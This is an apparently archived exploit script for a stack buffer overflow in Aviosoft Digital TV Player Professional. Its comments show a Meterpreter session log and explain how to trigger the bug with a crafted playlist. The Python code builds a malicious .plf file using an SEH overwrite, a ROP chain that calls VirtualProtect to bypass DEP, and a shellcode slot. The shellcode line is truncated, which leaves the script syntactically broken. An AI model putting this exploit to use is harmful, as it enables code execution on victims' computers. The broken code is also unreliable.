# Exploit Title: Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow
# Author: modpr0be
# Software Download: http://www.aviosoft.com/download.php?product=dtvplayerpro
# Date: 08/11/2011
# Tested on: Windows XP SP3, Windows 7 SP1
# Thanks: corelanc0d3r, cyb3r.anbu, otoy, sickness, 5m7x, loneferret, _sinn3r, mr_me
# msfexploit(handler) > exploit
# [*] Started reverse handler on
# [*] Starting the payload handler...
# [*] Sending stage (752128 bytes) to
# [*] Meterpreter session 1 opened ( -> at 2011-09-27 21:15:34 +0700
# meterpreter > sysinfo
# Computer: M1ABRAMS
# OS: Windows 7 (Build 7601, Service Pack 1).
# Architecture: x86
# System Language : en_US
# Meterpreter : x86/win32
# meterpreter >
# but this time, it will pop up calc
# How to:
# open aviosoft digital tv player --> load playlist --> choose adtv_bof.plf --> calc
# it's generated using mona.py with some modifications ;) thx corelanc0d3r
import struct
file = 'adtv_bof.plf'
totalsize = 5000
junk = 'A' * 872
align = 'B' * 136
# aslr, dep bypass using pushad technique
seh = struct.pack('<L', 0x6130534a) # ADD ESP,800 # RETN
rop = struct.pack('<L', 0x61326003) * 10 # RETN (ROP NOP)
rop+= struct.pack('<L', 0x6405347a) # POP EDX # RETN
rop+= struct.pack('<L', 0x10011108) # ptr to &VirtualProtect()
rop+= struct.pack('<L', 0x64010503) # PUSH EDX # POP EAX # POP ESI # RETN
rop+= struct.pack('<L', 0x41414141) # Filler (compensate)
rop+= struct.pack('<L', 0x6160949f) # MOV ECX,DWORD PTR DS:[EDX] # POP ESI
rop+= struct.pack('<L', 0x41414141) * 3 # Filler (compensate)
rop+= struct.pack('<L', 0x61604218) # PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C
rop+= struct.pack('<L', 0x41414141) * 3 # Filler (RETN offset compensation)
rop+= struct.pack('<L', 0x6403d1a6) # POP EBP # RETN
rop+= struct.pack('<L', 0x41414141) * 3 # Filler (RETN offset compensation)
rop+= struct.pack('<L', 0x60333560) # & push esp #ret 0c
rop+= struct.pack('<L', 0x61323EA8) # POP EAX # RETN
rop+= struct.pack('<L', 0xA13977DF) # 0x00000343-> ebx
rop+= struct.pack('<L', 0x640203fc) # ADD EAX,5EC68B64 # RETN
rop+= struct.pack('<L', 0x6163d37b) # PUSH EAX # ADD AL,5E # POP EBX # RETN
rop+= struct.pack('<L', 0x61626807) # XOR EAX,EAX # RETN
rop+= struct.pack('<L', 0x640203fc) # ADD EAX,5EC68B64 # RETN
rop+= struct.pack('<L', 0x6405347a) # POP EDX # RETN
rop+= struct.pack('<L', 0xA13974DC) # 0x00000040-> edx
rop+= struct.pack('<L', 0x613107fb) # ADD EDX,EAX # MOV EAX,EDX # RETN
rop+= struct.pack('<L', 0x60326803) # POP ECX # RETN
rop+= struct.pack('<L', 0x60350340) # &Writable location
rop+= struct.pack('<L', 0x61329e07) # POP EDI # RETN
rop+= struct.pack('<L', 0x61326003) # RETN (ROP NOP)
rop+= struct.pack('<L', 0x60340178) # POP EAX # RETN
rop+= struct.pack('<L', 0x90909090) # nop
rop+= struct.pack('<L', 0x60322e02) # PUSHAD # RETN
nop = '\x90' * 32
# windows/exec - 223 bytes
# http://www.metasploit.com
calc = (
sisa = 'C' * (totalsize - len(seh+rop+nop+calc))
payload = junk+seh+align+rop+nop+calc+sisa
f = open(file,'w')
print "Author: modpr0be"
print "Payload size: ", len(payload)
print "File",file, "successfully created"